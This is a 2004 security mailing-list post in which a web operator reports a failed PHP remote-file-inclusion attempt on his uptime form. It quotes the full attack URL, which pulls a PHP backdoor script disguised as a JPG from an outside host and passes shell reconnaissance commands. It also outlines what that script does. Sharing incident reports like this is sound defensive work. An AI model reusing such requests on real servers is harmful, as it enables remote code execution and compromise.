Security Incidents mailing list archives
Data Cha0s PHP script attempt
From: Kirby Angell <kangell () alertra com>
Date: Fri, 01 Oct 2004 22:51:51 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Source IP: 200.203.109.237 Attack: PHP form variable include Twice tonight our web server received URL requests like this: GET /uptime.php?pin=http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg?&cmd=ls%20/;uname%20-a;w HTTP/1.0 Host: uptime.alertra.com User-Agent: lwp-trivial/1.35 The attack attempts to trick the uptime.php form into loading the given URL through one of the form variables. Our forms are highly paranoid, so that didn't work. Of interest though, if you haven't seen it (and I hadn't) is the script they tried to download: http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg which isn't a JPG at all, but itself is a PHP page. I guess they thought that our "pin" variable was used in an "include" statement. The rogue PHP script does all sorts of interesting things such as, running commands (as in the attack above), gathering intelligence, attempting exploits, and setting up back doors. The script is apparently not too recent. It won't work on any default PHP install version 4.2 and above because it assumes the variables passed to it will be converted to global variables (see: http://www.php.net/manual/en/security.globals.php). Recent versions of PHP no longer do this. The attacking IP seems to be a radio station in Brazil. I have sent an e-mail to them informing them that they are probably compromised. I couldn't find much information about "lwp-trivial", but it seems to be not good for anything but badness. I guess I'll have to look into banning bots like this from our web server all together. - -- Thank you, Kirby Angell Get notified anytime your website goes down! http://www.alertra.com key: 9004F4C0 fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFBXiXX21unUZAE9MARAnW3AJ0fl6LqRCuHHvPa8cVg+2QKEPEAPACglchA LS8peUWtvAbSMlWVFW7jr7o= =vxrb -----END PGP SIGNATURE-----
Current thread:
- Data Cha0s PHP script attempt Kirby Angell (Oct 04)
- Re: Data Cha0s PHP script attempt Pall Thayer (Oct 04)